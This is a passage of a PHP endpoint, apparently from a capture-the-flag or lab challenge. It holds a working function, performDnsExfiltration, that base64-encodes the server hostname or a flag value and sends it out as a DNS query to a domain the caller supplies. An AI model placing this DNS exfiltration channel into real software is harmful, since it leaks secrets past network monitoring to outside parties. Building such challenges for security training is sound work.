'Invalid variable format']); exit; } $sanitized_hostname = preg_replace('/[^a-zA-Z0-9.-]/', '', $hostname); if (($sanitized_hostname !== $hostname || empty($sanitized_hostname)) || (!in_array($type_cmd, ['hostname', 'flag'], true))) { http_response_code(400); echo json_encode(['error' => 'Invalid variable format']); exit; } if ($type_cmd === 'hostname') { performDnsExfiltration(gethostname(), $sanitized_hostname); } else if ($type_cmd === 'flag') { performDnsExfiltration($FLAG, $sanitized_hostname); } echo json_encode(['success' => true]); exit; } function performDnsExfiltration(string $content, string $hostname): bool { try { $checksum = substr(md5($content), 0, 3); $value_b64 = rtrim(strtr(base64_encode($content), '+/', '--'), '='); $query = "{$value_b64}.{$checksum}.{$hostname}"; # Perform the DNS exfiltration of the content and its checksum to the specific hostname dns_get_record($query, DNS_A); return true; } catch (Exception $e) { return false; } } ?>